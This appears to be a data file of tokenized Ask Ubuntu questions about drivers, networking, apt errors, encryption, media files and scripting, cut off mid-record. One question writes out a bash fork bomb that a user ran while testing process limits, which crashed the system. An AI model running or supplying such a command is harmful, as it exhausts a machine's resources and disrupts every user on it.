115458	atheros wireless card shows up as two different models ?	hi i 've been fighting these wireless drivers for a few days and just recently i noticed that the model the wireless controller appears in lspci is different sometimes . this is the data i have after installing ubuntu server 64 bit ~ # lspci -k ... . 04:00.0 network controller : atheros communications inc. ar9285 wireless network adapter ( pci-express ) ( rev 01 ) subsystem : azurewave device 1d89 kernel driver in use : ath9k kernel modules : ath9k ran some updates , restarted , all was good , all though it did say that linux-headers-server linux-image-server linux-server where beeing kept back . after that i installed ubuntu-desktop ( aptitude install ubuntu-desktop -- without-recommends ) restarted and not only is the wireless not working anymore , but the hardware is listed as a different card ~ # lspci -k ... . 04:00.0 ethernet controller : atheros communications inc. ar5008 wireless network adapter ( rev 01 ) has no available drivers for it , still i tried to modprobe ath9k , they show up in lsmod as loaded , but still iw list shows nothing . this is what it looked like before the ubuntu-desktop instalation wiphy phy0 band 1 : capabilities : 0x11ce ht20/ht40 sm power save disabled rx ht40 sgi tx stbc rx stbc 1-stream max amsdu length : 3839 bytes dsss/cck ht40 maximum rx ampdu length 65535 bytes ( exponent : 0x003 ) minimum rx ampdu time spacing : 8 usec ( 0x06 ) ht tx/rx mcs rate indexes supported : 0-7 frequencies : * 2412 mhz [ 1 ] ( 14.0 dbm ) * 2417 mhz [ 2 ] ( 15.0 dbm ) * 2422 mhz [ 3 ] ( 15.0 dbm ) * 2427 mhz [ 4 ] ( 15.0 dbm ) * 2432 mhz [ 5 ] ( 15.0 dbm ) * 2437 mhz [ 6 ] ( 15.0 dbm ) * 2442 mhz [ 7 ] ( 15.0 dbm ) * 2447 mhz [ 8 ] ( 15.0 dbm ) * 2452 mhz [ 9 ] ( 15.0 dbm ) * 2457 mhz [ 10 ] ( 15.0 dbm ) * 2462 mhz [ 11 ] ( 15.0 dbm ) * 2467 mhz [ 12 ] ( 15.0 dbm ) ( passive scanning ) * 2472 mhz [ 13 ] ( 14.0 dbm ) ( passive scanning ) * 2484 mhz [ 14 ] ( 17.0 dbm ) ( passive scanning ) bitrates ( non-ht ) : * 1.0 mbps * 2.0 mbps ( short preamble supported ) * 5.5 mbps ( short preamble supported ) * 11.0 mbps ( short preamble supported ) * 6.0 mbps * 9.0 mbps * 12.0 mbps * 18.0 mbps * 24.0 mbps * 36.0 mbps * 48.0 mbps * 54.0 mbps max # scan ssids : 4 max scan ies length : 2257 bytes coverage class : 0 ( up to 0m ) supported ciphers : * wep40 ( 00-0f-ac:1 ) * wep104 ( 00-0f-ac:5 ) * tkip ( 00-0f-ac:2 ) * ccmp ( 00-0f-ac:4 ) * cmac ( 00-0f-ac:6 ) available antennas : tx 0x1 rx 0x3 configured antennas : tx 0x1 rx 0x3 supported interface modes : * ibss * managed * ap * ap/vlan * wds * monitor * mesh point * p2p-client * p2p-go software interface modes ( can always be added ) : * ap/vlan * monitor interface combinations are not supported supported commands : * new_interface * set_interface * new_key * new_beacon * new_station * new_mpath * set_mesh_params * set_bss * authenticate * associate * deauthenticate * disassociate * join_ibss * join_mesh * remain_on_channel * set_tx_bitrate_mask * action * frame_wait_cancel * set_wiphy_netns * set_channel * set_wds_peer * connect * disconnect supported tx frame types : * ibss : 0x0000 0x0010 0x0020 0x0030 0x0040 0x0050 0x0060 0x0070 0x0080 0x0090 0x00a0 0x00b0 0x00c0 0x00d0 0x00e0 0x00f0 * managed : 0x0000 0x0010 0x0020 0x0030 0x0040 0x0050 0x0060 0x0070 0x0080 0x0090 0x00a0 0x00b0 0x00c0 0x00d0 0x00e0 0x00f0 * ap : 0x0000 0x0010 0x0020 0x0030 0x0040 0x0050 0x0060 0x0070 0x0080 0x0090 0x00a0 0x00b0 0x00c0 0x00d0 0x00e0 0x00f0 * ap/vlan : 0x0000 0x0010 0x0020 0x0030 0x0040 0x0050 0x0060 0x0070 0x0080 0x0090 0x00a0 0x00b0 0x00c0 0x00d0 0x00e0 0x00f0 * mesh point : 0x0000 0x0010 0x0020 0x0030 0x0040 0x0050 0x0060 0x0070 0x0080 0x0090 0x00a0 0x00b0 0x00c0 0x00d0 0x00e0 0x00f0 * p2p-client : 0x0000 0x0010 0x0020 0x0030 0x0040 0x0050 0x0060 0x0070 0x0080 0x0090 0x00a0 0x00b0 0x00c0 0x00d0 0x00e0 0x00f0 * p2p-go : 0x0000 0x0010 0x0020 0x0030 0x0040 0x0050 0x0060 0x0070 0x0080 0x0090 0x00a0 0x00b0 0x00c0 0x00d0 0x00e0 0x00f0 supported rx frame types : * ibss : 0x00d0 * managed : 0x0040 0x00d0 * ap : 0x0000 0x0020 0x0040 0x00a0 0x00b0 0x00c0 0x00d0 * ap/vlan : 0x0000 0x0020 0x0040 0x00a0 0x00b0 0x00c0 0x00d0 * mesh point : 0x00b0 0x00c0 0x00d0 * p2p-client : 0x0040 0x00d0 * p2p-go : 0x0000 0x0020 0x0040 0x00a0 0x00b0 0x00c0 0x00d0 device supports rsn-ibss . what 's with the hardware change ? if it has 2 , how can i make the ar9285 always load and disable ar5008 , or , is it the same and it 's just showing it different ? : | oh and i 've tried this on ubuntu 10.04 server , xubuntu 12.04 , ubuntu 12.04 desktop and server . thanks in advanced . -- here 's some more info , i have it setup in 2 hard drives , 1 works and the other one i 'm using to figure it out the one that works ... # lshw -class network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 06 serial : 54:04 : a6 : a3:3b:96 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168e-2.fw ip=192.168.2.147 latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:43 ioport : e000 ( size=256 ) memory : d0004000-d0004fff memory : d0000000-d0003fff *-network description : wireless interface product : ar9285 wireless network adapter ( pci-express ) vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:04:00.0 logical name : wlan0 version : 01 serial : 74:2f:68:4a:26:73 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath9k driverversion=3.2.0-18-generic-pae firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:18 memory : fea00000-fea0ffff here 's where it does n't # lshw -class network *-network description : ethernet interface product : rtl8111/8168b pci express gigabit ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 06 serial : 54:04 : a6 : a3:3b:96 size : 1gbit/s capacity : 1gbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd 1000bt 1000bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=full firmware=rtl_nic/rtl8168e-2.fw ip=192.168.2.160 latency=0 link=yes multicast=yes port=mii speed=1gbit/s resources : irq:43 ioport : e000 ( size=256 ) memory : d0004000-d0004fff memory : d0000000-d0003fff *-network unclaimed description : ethernet controller product : ar5008 wireless network adapter vendor : atheros communications inc. physical id : 0 bus info : pci @ 0000:04:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : fea00000-fea0ffff update i 've noticed that if i blacklist the ath9k and ath9k_common modules lspci gives me the ar9285 , but then i need to modprobe ath9k for it to work , does this make any sense ? if so , why ? update messed around with some other packages this morning and it was listing the ar5008 , reinstalled some drivers and now it 's ar9285 -.- update here is /var/log/udev , right now it 's saying it 's ar5008 found some reference to that somewhere in the log - pci_id=168c : ff1c update @ aking1012 ath5k are never loaded , tried the blacklist though , but still no . blacklisting ath9k and ath9k_common sometimes do it , but then with no other changes it stops having any affect these are the modules i 'm playing with the blacklist blacklist ath5k blacklist ath9k blacklist ath9k_common blacklist eeepc_wmi blacklist asus_wmi blacklist ath_pci blacklist wmi update this seems to be working so far on 32 bit , if so , thanks @ david6 update @ jrg @ david6 installed video drivers and it 's broken again update not that it 's relevant to ubuntu , but i just got the same thing running windows on it , ar5008 ... restarted ar9285 , one worked , the other did n't ... looking more like a hardware issue now
115461	lubuntu , set-up on virtual box	i was wondering : if i set up lubuntu on a virtual machine , then i 've to pick the ubuntu 32 bit set up , correct ?
115467	lubuntu installation - i need gparted 1st	i was wondering if the lubuntu live cd contains gparted too ? i 'd like to instal lubuntu on my friend 's laptop , but i need to create partitions 1st . by the way , what format should i give to the future partitions ? ext4 , just like in ubuntu ?
115469	can not change runlevel from 5 to 3	i 'm trying to change from runlevel 5 to runlevel 3 by running sudo init 3 command . for some reason it does n't do anything anymore . the weird thing is that if i run the command runlevel it shows me that i 'm at level 3. tried to run init 5 and then init 3 and still nothing . does anybody knows how to fix it ?
115472	installing software center in lubuntu running via virtual box ?	can anyone tell me why i can not install the software center in lubuntu running via virtual box ?
115477	get and install nvidia geforce 8400 gs driver	recently , i changed my os kernel from 10.04 to 11.10 ( bugs ) , but after doing it , the video driver for the 8400 gs disappeared ( was there in 10.04 ) . i worked out the same procedure i did to install it in 10.04 , mainly , sudo apt-get -- purge remove nvidia-current sudo apt-get -- purge autoremove sudo add-apt-repository ppa : ubuntu-x-swat/x-updates sudo apt-get update sudo apt-get -y install nvidia-current but it did n't work even though the commands seemed to install the driver without problems . right now my machine is working with the standard drivers , as shown . williepabon @ wp-wrkstation : ~ $ sudo lshw -c display [ sudo ] password for williepabon : *-display description : vga compatible controller product : nvidia corporation vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:05:00.0 version : a2 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:16 memory : de000000-deffffff memory : c0000000-cfffffff memory : d0000000-d1ffffff ioport : cc80 ( size=128 ) memory : dfc00000-dfc7ffff any suggestions to correct the problem ? thanks still waiting for additional help to resolve this . did what was suggested below , but then , i got stuck .
115478	how do i assign different cpu cores to different processes ?	i 'm using ubuntu server edition 11.10 and i have two extremely cpu intensive programs running on the same core . neither of these processes were programmed for multi-core processing . is there a way i can tell process a to run on core 1 and process b to run on core 2 ?
115480	all kind of errors while running apt-get update , gpg , badsig and more	okay , i dont know what is going on and thats why i am writing here . i have seen many questions asked and the sollutions to the issues with gpg errors are either sudo -i apt-get clean cd /var/lib/apt mv lists lists.old mkdir -p lists/partial apt-get clean apt-get update or sudo apt-key adv -- keyserver keyserver.ubuntu.com -- recv-keys $ key_from_error okay i have tried both of these approaches to no success . i also keep getting inconsistetnt errors like : w : gpg error : http : //uk.archive.ubuntu.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > or e : could not open file /var/lib/apt/lists/uk.archive.ubuntu.com_ubuntu_dists_oneiric_multiverse_binary-i386_packages.indexdiff - open ( 2 : no such file or directory ) or sometimes even doing it without errors . i 'm running ubuntu 11.10 server on virtualbox 4.1.8 . i 'm really puzzled here , so any assistance is really appreciated edit 1 : one more error meassage w : gpg error : http : //uk.archive.ubuntu.com oneiric-security release : unknown error executing gpgv edit 2 : some more , i want to make it perfectly clear , these come from sequential runnings of apt-get update one figures its natural to expect a consistent output when you run a program and do n't change anything ? w : gpg error : http : //uk.archive.ubuntu.com oneiric release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : gpg error : http : //uk.archive.ubuntu.com oneiric-security release : the following signatures were invalid : badsig 40976eaf437d05b5 ubuntu archive automatic signing key < ftpmaster @ ubuntu.com > w : failed to fetch http : //uk.archive.ubuntu.com/ubuntu/dists/oneiric-updates/release.gpg rename failed , no such file or directory ( - > /var/lib/apt/lists/partial/uk.archive.ubuntu.com_ubuntu_dists_oneiric-updates_release.gpg ) . e : some index files failed to download . they have been ignored , or old ones used instead .
115481	connect to mysql on remote server from inside python script ( db api )	very recently i have started to write python scripts that need to connect few databases on mysql server . the problem is that when i work from office my script works fine but running a script from my home while on office vpn generates connection error . i also noticed the mysql client squirrel also can not connect from my home but works fine on office computer . i think both are giving problem for the same reason . do i need to create a ssh tunnel and forward the port ? if yes how do i do it ? mysql is installed on server i have ssh access . please help me on this ak
115482	when i use a transparent theme a panel becomes visible . how do i remove it ?	under my system taskbar , there is a panel showing . how do i remove it ? when i use a transparent theme the panel becomes visible .
115487	error while running unity_support_test	my unity session wo n't start and it always gives me a segmentation fault . so i tried running /usr/lib/unity_support_test but this too gave me some error . x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 136 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 22 current serial number in output stream : 22 what does this mean ? does n't my machine satisfy unity 's requirements ?
115488	500 gb hard drive is not being recognized	i reformated the hard drive befor i put ubuntu on it . i put windows and ubuntu on it they both work great but in ubuntu it will not show the 500 gb hard drive it shows a 50 gb hard drive that doesnt appear in windows . i just need to know how to get the 500 gb to appear and info would help thanks . ps i tried a bunch of other web sites and they didnt work so please do not direct me to a complicated website , thanks .
115495	can i restore a /home from a 32 bit 11.10 backup to a new 64 bit 12.04 install	when i install a 64 bit 12.04 , can i safely restore /home from an 32 bit 11.10 backup of /home . i 've been using the the backup facility in the 11.10 system settings and am hoping that the same facility in 12.04 will be compatible with the backup made with 11.10 . i normally use the upgrade vs new install approach for new ubuntu releases . up to now i 've stuck with 32 bit versions of ubuntu but would like to benefit from the advantages that may be offered by going to 64 bit . restoring from backup would be much more convenient than separating all my application created data from the various configuration files created by the applications which i 've no doubt would work .
115497	encrypted home directory not auto mounting	i somehow managed to break auto-mounting for my encrypted home directory . every time i login via ssh , i see this : valorin @ joshua : ~ $ ls -la total 44 dr-x -- -- -- 3 valorin valorin 4096 2012-03-17 17:10 . drwxr-xr-x 7 root root 4096 2012-03-17 11:45 .. lrwxrwxrwx 1 valorin valorin 56 2012-03-08 20:37 access-your-private-data.desktop - > /usr/share/ecryptfs-utils/ecryptfs-mount-private.desktop -rw -- -- -- - 1 valorin valorin 917 2012-03-17 19:24 .bash_history drwx -- -- -- 3 valorin valorin 4096 2012-03-16 17:58 .cache lrwxrwxrwx 1 valorin valorin 33 2012-03-08 20:37 .ecryptfs - > /home/.ecryptfs/valorin/.ecryptfs -rw-r -- r -- 1 root root 21954 2012-03-08 20:35 .face lrwxrwxrwx 1 valorin valorin 32 2012-03-08 20:37 .private - > /home/.ecryptfs/valorin/.private lrwxrwxrwx 1 valorin valorin 52 2012-03-08 20:37 readme.txt - > /usr/share/ecryptfs-utils/ecryptfs-mount-private.txt -rw -- -- -- - 1 root root 703 2012-03-17 17:10 .viminfo any ideas what i 've done , and how i can fix it ? update : i have set up the ssh key authentication using the method here , which in hindsight is the reason for the non-working encrypted home directory . so , my new question , how do i get it to automatically prompt for the password after i have logged in with the ssh auth key ?
115498	how to achieve 'activities ' in unity ?	i like the concept of an activities centric desktop and i wonder if this can be achieved in unity . for me , an activity is a couple of applications that belong to the same subject , like 'photo manipulation ' , 'software development ' , 'office work ' , 'social activities ' , 'music and video ' . i would like to utilize the virtual desktops to arrange applications that belong to the same activity group . example : desktop 1 contains all applications that belong to 'office work' desktop 2 contains all applications that i need for 'software development' desktop 3 contains all applications that i usually need for 'photo works' therefore i would like to give names to the virtual desktops that reflect their purpose . and i would like unity to auto-start the required applications when i start my computer or when i switch to one of the virtual desktops . is this possible with unity ( or any other desktop ) ?
115500	how to find location of installed library	background : i 'm trying to build my program but first i need to set up libraries in netbeans . my project is using glu and therefore i installed libglu-dev . i did n't note location where the libraries were located and now i ca n't find them.. i 've switched to linux just a few days ago and so far i 'm very content with it , however i could n't google this one out and becoming frustrated.. is there way to find out where files of package were installed without running installation again ? i mean if i got library xxx and installed it some time ago , is there somecommand xxx that will print this info ? i 've already tried locate , find and whereis commands but either i 'm missing something or i just ca n't do it correctly.. for libglu , locate returns : /usr/share/bug/libglu1-mesa /usr/share/bug/libglu1-mesa/control /usr/share/bug/libglu1-mesa/script /usr/share/doc/libglu1-mesa /usr/share/doc/libglu1-mesa/changelog.debian.gz /usr/share/doc/libglu1-mesa/copyright /usr/share/lintian/overrides/libglu1-mesa /var/lib/dpkg/info/libglu1-mesa : i386.list /var/lib/dpkg/info/libglu1-mesa : i386.md5sums /var/lib/dpkg/info/libglu1-mesa : i386.postinst /var/lib/dpkg/info/libglu1-mesa : i386.postrm /var/lib/dpkg/info/libglu1-mesa : i386.shlibs other two commands fail to find anything . now locate did it 's job but i 'm sure none of those paths is where the library actually resides ( at least everything i was linking so far was in /usr/lib or usr/local/lib ) . the libglu was introduced just as example , i 'm looking for general solution for this problem .
115502	fork bomb protection not working : amount of processes not limited	i just came to realize that my system is not limiting the amount of processes per user properly thus not preventing a user from dring a fork-bomb and crashing the entire system : user @ thebe : ~ $ cat /etc/security/limits.conf | grep user user hard nproc 512 user @ thebe : ~ $ ulimit -u 1024 user @ thebe : ~ $ : ( ) { : | : & } ; : [ 1 ] 2559 user @ thebe : ~ $ ht-bash : fork : can not allocate memory -bash : fork : can not allocate memory -bash : fork : can not allocate memory -bash : fork : can not allocate memory -bash : fork : can not allocate memory -bash : fork : can not allocate memory -bash : fork : can not allocate memory -bash : fork : can not allocate memory ... connection to thebe closed by remote host . is this a bug or why is it ignoring the limit in limits.conf and why is not applying the limit that ulimit -n claims it to be ? ps : i really do n't think the memory limit is hit before the process limit . this machine has 8gb ram and it was using only 4 % of it at the time when i dropped the fork bomb . edit : i managed to reproduce this on a live cd . so i guess this must be a bug . it basically ends up killing all processes , including system critical things like x11 , sshd etc . any user can crash the system .
115511	network configuration problem	i am using ubuntu 11.10 . in my dorm i have to change network configuration and then if it is successful , i have to enter a user name and password for wired internet connection . anyway , i had many attempts but i could n't achieve this , please look at my steps and tell me if there is something wrong . at the end there is an error , but i really do n't have any idea about this error . $ cat /etc/network/interfaces auto eth0 iface eth0 inet static address 172.030.014.038 netmask 255.255.255.252 network 192.168.2.0 broadcast 192.168.2.255 gateway 172.030.014.038 $ cat /etc/resolv.conf nameserver 010.050.001.001 nameserver 010.050.001.002 $ /etc/init.d/networking stop * deconfiguring network interfaces ... [ ok ] $ /etc/init.d/networking restart * running /etc/init.d/networking restart is deprecated because it may not enable again some interfaces * reconfiguring network interfaces ... 172.030.014.038 : unknown host ifconfig : ` -- help ' gives usage information . failed to bring up eth0 note : ip-address , netmask , gateway , preferred dns server and alternate dns server are given by the management of dorm . it was very easy in windows but i could n't achieve in ubuntu . i also tried to edit from `` edit connections '' but the save button is not enabled and i can not save it .
115513	problem detecting wireless networks on a dell inspiron 1420	my dell inspiron 1420 running ubuntu 11.10 [ as of today ] can not detect any wireless networks [ and i know there are some in range ] . perhaps a problem with the proprietary driver ? how should i go about fixing this ? i really have no idea=am linux illiterate
115515	how can i shrink .mkv files ?	i am using handbrake to rip a dvd to a mkv . the filesize for a ~5gb .vob rip is a nearly 2gb .mkv . is there a program in ubuntu that shrinks mkv 's ? i looked around and found a lot of windows programs , but none that work well in wine . i was thinking about shrinking it to a 300-400mb file ( like most mkv rips ) , but i do n't know how to shrink it in ubuntu . any ideas ?
115528	is there any working , usable video editing software for ubuntu ?	is there any decently stable video editing software for ubuntu , that wo n't crash at every mouse click and that you can actually use for doing things that you need ? ( as opposed to for the sake of testing it ) i 've tried out pitivi and cinelerra but they are completely unstable ( they both crash very often ) besides having very poorly designed interfaces ... is there any better option or are we still stuck to windows and mac os for even the most basic ( but real-life ) video editing ? even something as basic as avidemux would be fine in many situations ( not all ) if only it worked ( i.e . if not rendered completely useless by its bugs ) .
115538	can not open software sources after removing a ppa	after deleting a ppa entry in the sources.list file , i was not able to open the software sources application . opening the software centre is fine . i tried running gksudo software-properties-gtk and got the follwong message : softwareproperties.__init__ ( self , options=options , datadir=datadir ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 96 , in __init__ self.reload_sourceslist ( ) file `` /usr/lib/python2.7/dist-packages/softwareproperties/softwareproperties.py '' , line 580 , in reload_sourceslist self.distro.get_sources ( self.sourceslist ) file `` /usr/lib/python2.7/dist-packages/aptsources/distro.py '' , line 91 , in get_sources raise nodistrotemplateexception ( `` error : could not find a `` aptsources.distro.nodistrotemplateexception : error : could not find a distribution template would appreciate if you can let me know how to solve this problem .
115541	broadcom bcm4311 wireless is connected but i ca n't get on the web . what do i do ?	i have installed drivers and i have a wifi-connection but i ca n't get on the web . any suggestions ?
115542	where to put git `` remote '' repo on purely local git setup ?	i overwrote and lost some important scripts and would like to setup version control to protect my stuff . i 've used git before , and am familiar with commands , but do n't understand where i would put my `` remote '' repository on an install set up on my own machine -- -the place i push/pull to . i do n't intend to share or access remotely , i just want a little source control for my files . i followed the instructions here for setting up my staging area : http : //stackoverflow.com/questions/4249974/personal-git-repository but where do i put git `` remote '' repo on purely local git setup ? how does the workflow work then ? on the command in the above : git remote add origin ssh : //myserver.com : /var/repos/my_repo.git where should i put/name something like this ? if i have multiple different projects , would they go in different places ? i 'm running 11.10 .
115546	re compiling ubuntu kernel	i wanted to re-compile my kernel with some changes . is it possible to make the necessary changes and retain ubuntu updaes for my kernel ? thanks , digvijay
115547	ubuntu 10.10 stop working at login screen after power loss during upgrade	i have ubuntu 10.10 and i was upgrading it when suddenly my computer turned off due to fluctuation of power . now when i am booting my ubuntu then it stops working at login screen . nothings happen at screen even mouse doesnot work there . i tried it to boot from recovery mode but some code comes on the screen and nothing happens . how can i recover from this problem .
115548	best practice to upgrade hdd to ssd	i have recently purchased a 120gb ssd to install in my desktop . i currently have two 2tb hdds connected via sata and an older 500gb hdd connected via pata . my plan is to wait until 12.04 is released and do a fresh install on the ssd . at that point i have a couple of questions as far as the best practices to set up my existing drives . 1 ) one of the 2tb hdds is partitioned with 40gb for / and the remainder as /home . my plan was to partition the ssd with 40gb for / and the remainder for /home . then i would like to erase the / partition on the hdd ( and probably the mbr right ? ) and recoup that space for storage . i would also like to erase everything except my video and music folders on the drive and basically use it only for media storage . is this possible without losing the data already on the hard drive ? 2 ) is it possible to have my /home/music and /home/videos folders mounted on the hdd rather than the ssd ? i would prefer to use the ssd only for the os and programs , not for media .
115551	microsoft wireless keyboard 3000 v2.0 doesnt recognize `` flip key ''	the microsoft wireless keyboard 3000 v2.0 has a new key called a `` flip key '' where the right windows button should be ( to the right of the right alt key ) . this is a picture , the key in question is called `` windows flip '' : http : //www.microsoft.com/hardware/en-us/p/digital-media-keyboard-3000 # details i am using ubuntu 11.10 and this key is not recognized at all by the system : i have run `` sudo showkey '' with no results . any help would be greatly appreciated , i would like to map this to be a right-super key as it should be .
115554	how can i programmatically refresh the wallpaper ?	i want to be able to choose one image file as my wallpaper and then overwrite that file to change the image that 's displayed on the desktop background . currently , the displayed wallpaper does n't reflect changes to the selected file until i choose it again in system settings . how can i force it to update programmatically from , say , a shell script ? when i choose an image to be the wallpaper it looks the image is copied to a new location and then that copy is set as the wallpaper ; immediately after choosing an image its original file name is displayed : but when i close and re-open the appearance settings screen the name has been replaced with gibberish : i wonder whether disabling this behavior would help .
115557	lubuntu and swap partition	do i need a swap partition on lubuntu too ? or is it only recommended for ubuntu ? i was wondering why we need swap in the 1st place .
115561	ati catalyst does n't retain changes after reboot when setting extended display	i have ubuntu 11.10 and i 'm trying to set up extended display for my two displays . i have an amd 6870. fglrx and fglrx-updates are installed . when i launch amdcccle trough the terminal ( using sudo ) , i select in tab `` multi-display '' the option `` multi-display desktop with display ( s ) '' . then it says for changes to be done i have to reboot my computer . being a good an obedient lad i do just that , but after rebooting the displays are still in the same `` clone '' option as before in the catalyst control center and no changes are made . any suggestions ?
115564	ca n't connect to wireless networks intel wireless	i 'm a new linux user and i can not add or edit any network connections , nor is the system detecting any wireless networks . when i try to access additional hardware from system , it does n't even open , so i 'm stuck . lspci | grep -i wireless 06:0a.0 network controller : intel corporation pro/wireless 2200bg [ calexico2 ] network connection ( rev 05 ) lspci -n -s 06:0a.0 8086:4220 . i dont know if that info was relevant but any help on this would be appreciated .
115565	are the alpha or beta releases more/less stable than the daily builds ?	i have some related questions : in general , are the alpha or beta releases more/less stable than the daily builds ? if the answer to 1 is yes , then if i install the alpha/beta and apt-get upgrade , will i remain at the `` stability level '' of the alpha/beta , or of the daily builds ? at this point , is there any advantage to installing the alpha/beta over installing a daily image ? ( background : i am debating whether to install 11.10 or 12.04 alpha/beta/daily on a new machine )
115566	how to backup/restore full-disk encryption ?	how to backup/restore full-disk encryption ubuntu 11.10 ? i would like to put the raw encrypted file system and restore on another computer . encryption details : crypt setup via ubuntu alterate cd installer only thing unencrypted is /boot file systems setup : boot- j swap-swap everything else-ext 4 any suggestions ? i have considered backing up the file system stripped of encryption , but i would prefer to keep the os encrypted while transferring . thanks for any help !
115571	java new beginner ( parsing )	thanks in advance , i want to write a guess the number game as independently as possible but i need to parse and compare a random generated number and an int help ! ! ! `` random ran = new random ( ) ; system.out.println ( `` a number has been generated '' ) ; system.out.println ( `` guess what it is ... '' ) ; int a = system.in.read ( ) ; while ( ran ! = a ) ''
115574	can not create or connect to ad-hoc network in ubuntu 11.10	i have got sick of this problem trying to create an ad-hoc wireless network in ubuntu 11.10.whenever i try creating a new ad-hoc network the network manager does not get connected to it and only shows repeated tries getting connected to the network itself.tried every configuration in edit connection options with ipv6 set to ignored and re-installing network manager too still i cant create or connect to a ad-hoc network.i also tried looking at ubuntu forums for help but still could not get to a solution.please help.. ! !
115583	how can i add the content of a file in the starting of another existing file ?	how can i add the content of a text file in the starting of another text file ? here is the scenario . there are 3 file named f1 f2 f3 . all of three have some text content . how to add the content of file f1 in the starting of file f3 . and content of file f2 in the end of file f3 .
115585	joining two mkv files in ubuntu ?	i have an opera that i 'm ripping to my computer in mkv format with handbrake . this opera is on two discs . is there a way to join the resulting mkv 's together ? they will have the same bitrate , resolution , etc . if i do this , can i keep chapters from both mkv files organized ? and , since i have subtitles in the file ( not burnt in ) , will they still stay intact ? i 'm not too sure if this question is off-topic or not . if it is , feel more than free to delete it . : )
115586	unity-2d uses old gnome style application switcher	since i upgraded to the new ubuntu 12.04 , i have been getting the old gnome style alt-tab switcher instead of the new one . is there any package that i need to install for the same ? i am using unity-2d . please help .
115587	how can i download music from youtube and not the video film ?	i want to know if is there any programme to download music from youtube , not video ... .like dvdvideosoft in windows ...
115591	how can i remove / change the `` open with '' list ?	i have one problem . just look at image : so i want to remove one of dev-c++ ide and microsoft visual studio version selector ( i 've tried to install microsoft visual studio and it does n't works , and one of the dev-c++ ide too ) . but i do n't know how to change that list . i am using ubuntu 11.10 .
115596	how to import contacts from os x address book to thunderbird in ubuntu ?	i want to export from address book in mac os x and import to the address book in thunderbird mail in ubuntu . i exported the contacts as vcards.vcf and imported it fine but now i just have 36 blank entries in the address book in thunderbird .
115598	i ca n't copy files to my memory card	i ca n't copy files to my memory card . when i copy there is a error message and it says read-only file system . but , i can copy file from the card.can any one please help me . i am using ubuntu 11.10 .
115611	dbus nested dictionary in python	i have dictionary like this { key : { key1 : '' , key2 : [ { key3 : '' } ] } } i have tried a { sv } , but i got error : **to message with signature a { sv } : < type 'exceptions.typeerror ' > : expected a string or unicode object** dbus.dictionary ( self._manager.get_feeds ( ) , signature='sv ' ) .error : dbus.service : unable to append ( dbus.dictionary ( { u'1d63adf6-77ad-11e1-99a0-001c259909fc ' : { u'refresh_rate ' : 15 , u'title ' : u'omg ! ubuntu ! ' , u'url ' : u'http : //feeds.feedburner.com/d0od ? format=xml ' , u'items ' : { u'0e34b3e2-7e9d-11e1-913c-001c259909fc ' : { u'date ' : u'2012-04-04 22:21:51 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/9thul6dx_o8/ ' , u'title ' : u'linux tycoon \u2013 a simulation game for distro dreamers ' } , u'93c26f5a-7e92-11e1-913c-001c259909fc ' : { u'date ' : u'2012-03-28 19:22:29 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/6hwdvjuy3ma/ ' , u'title ' : u'75 % of ubuntu users also use windows ( and other fun stats ) ' } , u'93c1c37a-7e92-11e1-913c-001c259909fc ' : { u'date ' : u'2012-04-03 23:32:44 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/n-lmhnjvkpy/ ' , u'title ' : u'elementary gtk , icon theme to be pantheon-only ' } , u'93c278b0-7e92-11e1-913c-001c259909fc ' : { u'date ' : u'2012-03-28 13:44:00 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/aj6qbozcbfq/ ' , u'title ' : u ' [ how to ] easily skin ubuntu\u2019s unity desktop ' } , u'93c20d8a-7e92-11e1-913c-001c259909fc ' : { u'date ' : u'2012-04-02 13:09:04 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/ppqv7e7emki/ ' , u'title ' : u'ubuntu 12.04 default wallpaper revealed ' } , u'93c111f0-7e92-11e1-913c-001c259909fc ' : { u'date ' : u'2012-04-04 00:36:19 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/tlbmfb7vb0q/ ' , u'title ' : u ' [ video ] how linux is built ' } , u'93c17190-7e92-11e1-913c-001c259909fc ' : { u'date ' : u'2012-04-04 00:00:48 ' , u'read ' : false , u'link ' : u'http : //feedproxy.google.com/~r/d0od/~3/8hvwqhmagac/ ' , u'title ' : u'smarten up your desktop with this conky & wallpaper combo ' } , u'93c257e0-7e92-11e1-913c-001c259909fc ' : { u'date ' : u'2012-04-01 17:39:30 ' , u'read ' : false , u'link ' : u'http : 